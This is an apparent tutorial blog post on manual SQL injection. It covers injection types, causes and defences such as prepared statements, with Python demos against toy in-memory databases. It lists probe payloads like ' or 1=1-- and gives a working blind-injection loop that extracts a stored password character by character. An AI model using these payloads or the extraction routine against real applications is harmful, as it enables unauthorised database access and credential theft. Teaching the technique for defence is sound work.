
Dumping database using sql injection

I have given an overview of SQL injection (SQLi) in my previous post. As I mentioned there, SQLi can be done in two ways:

MANUALLY.

AUTOMATION.

Here we are going to discuss the manual method of injection.

Manual SQL injection is done by pen-testing the application by hand: the pen-tester or attacker interacts with the application directly, injects malicious strings into its inputs and digs out juicy information such as usernames, passwords, SSNs, etc., without using any tool.

In-band: the application returns the result of the injection over the same channel that carried it (the HTTP response). Error-based SQLi, where a database error message leaks data, and union-based SQLi, where a UNION SELECT appends the attacker's rows to the normal result, are both in-band. It is the most straightforward method.

Out-of-band: the result comes back over a different channel from the one that carried the injection. The attacker enters data directly into the application, but the data leaves through something like a DNS or HTTP request made by the database server, or an e-mail sent by the application.

Blind SQL injection: the application does not show any error or any data from the query. Instead the attacker asks true/false questions through the injection and extracts the data by observing how the application's response differs (different page content, or a different response time).

Causes for SQL Injection:

A vulnerability of this kind can have many causes, for example:

Improper coding

The developer not being aware of this class of vulnerability

Improper input validation

Improper filtering or escaping of special characters

Inserting the values received from the web form directly into the SQL query.

Avoiding SQLI:

Using prepared statements (parameterized queries) is the best defence against SQLi: the query is parsed with placeholders first and the user-supplied values are bound afterwards as data, so they can never change the structure of the statement.

Doing proper input validation

Escaping suspicious strings or characters

Using filters or allow lists (whitelists), allowing only the required characters
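As an added example (not code from the original post), here is the last cause above, values spliced straight into the query, beside the prepared-statement fix, plus a small allow-list check, using Python's sqlite3 module against a constructed in-memory user table. The function names, the table and the sample credentials are assumptions made for the illustration.

```python
import re
import sqlite3


def make_user_db():
    # Constructed in-memory stand-in for the application's user table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    # Cause: the form values are spliced straight into the query text, so a
    # quote in either field becomes part of the SQL and changes its structure.
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return [row[0] for row in conn.execute(query)]


def login_prepared(conn, username, password):
    # Fix: the statement is parsed with '?' placeholders first; the values are
    # bound afterwards as data, so a quote in them is just a character.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


# Allow-list validation: only the characters a username is expected to contain.
# Defence in depth alongside binding, not a replacement for it.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_allowed_username(username):
    return USERNAME_RE.fullmatch(username) is not None


if __name__ == "__main__":
    conn = make_user_db()
    # "alice'--" comments out the password check: WHERE username = 'alice'--' ...
    print(login_vulnerable(conn, "alice'--", "wrong"))
    # "' OR 1=1--" makes the WHERE clause true for every row.
    print(login_vulnerable(conn, "' OR 1=1--", "wrong"))
    # The same strings are harmless once they are bound as data.
    print(login_prepared(conn, "' OR 1=1--", "wrong"))
    print(is_allowed_username("' OR 1=1--"))
```

Note the operator precedence in the classic payload: `' OR '1'='1` in only the username field gives `username = '' OR ('1'='1' AND password = '...')`, which still fails on the password; it has to go in both fields, or a comment marker has to cut the query off as above.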

Exploiting the Vulnerability:

In order to exploit the vulnerability, we first need to confirm that the application is vulnerable to SQL injection. We can test this in many ways, by inserting logical strings such as ', 'or'=', ' or 1=1, ' or 'a'='a, etc., and watching whether the application returns an error, changes its page content, or returns extra rows.
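The same probes run against a constructed, deliberately vulnerable product search, as an added example not taken from the original post. It classifies each probe by what a tester would observe (an error, rows, or nothing), then carries the blind technique described above through to a full extraction: every probe becomes a true/false question, and the answer is read off whether the page shows rows. The search function, the tables, the admin credentials and the helper names are all assumptions made for the illustration.

```python
import sqlite3

# Subquery the attacker wants to read out one character at a time (assumed
# table and column names).
SECRET = "(SELECT password FROM users WHERE username = 'admin')"


def make_shop_db():
    # Constructed in-memory stand-in for the application's database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("apple",), ("pear",)])
    conn.execute("INSERT INTO users VALUES ('admin', 'Passw0rd')")
    return conn


def search_vulnerable(conn, name):
    # Hypothetical product search that pastes the parameter into the query.
    query = "SELECT name FROM products WHERE name = '%s'" % name
    return conn.execute(query).fetchall()


def probe(conn, payload):
    # What the tester sees for one injected string: a database error
    # (in-band, error-based), result rows, or an empty page.
    try:
        rows = search_vulnerable(conn, payload)
    except sqlite3.OperationalError:
        return "error"
    return "rows" if rows else "empty"


def ask(conn, condition):
    # Blind channel: 'apple' exists, so rows come back exactly when the
    # injected condition is true. '--' comments out the trailing quote.
    return probe(conn, "apple' AND (%s)--" % condition) == "rows"


def blind_length(conn, max_len=64):
    # First find how many characters we have to recover.
    for n in range((1), max_len + 1):
        if ask(conn, "length(%s) = %d" % (SECRET, n)):
            return n
    return None


def blind_extract(conn):
    # Recover each character by bisecting its code point over printable ASCII
    # (32..126), about seven yes/no questions per character instead of one
    # question per candidate character.
    n = blind_length(conn)
    if n is None:
        return None
    out = ""
    for i in range(1, n + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(conn, "unicode(substr(%s, %d, 1)) > %d" % (SECRET, i, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    conn = make_shop_db()
    for payload in ["apple", "'", "' or 1=1--", "' or 'a'='a", "apple' and 1=2--"]:
        print("%-20r -> %s" % (payload, probe(conn, payload)))
    print("admin password:", blind_extract(conn))
```

The single quote alone breaks the query (error-based confirmation), `' or 1=1--` and `' or 'a'='a` return every product, and the pair `apple' and 1=1--` / `apple' and 1=2--` shows that the application's output tracks the truth of an injected condition, which is all the blind extraction loop needs.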

I have written an article on exploiting the vulnerability and extracting the complete database using all three types (in-band, out-of-band, blind). You can find the article here: Dumping database using SQL Injection.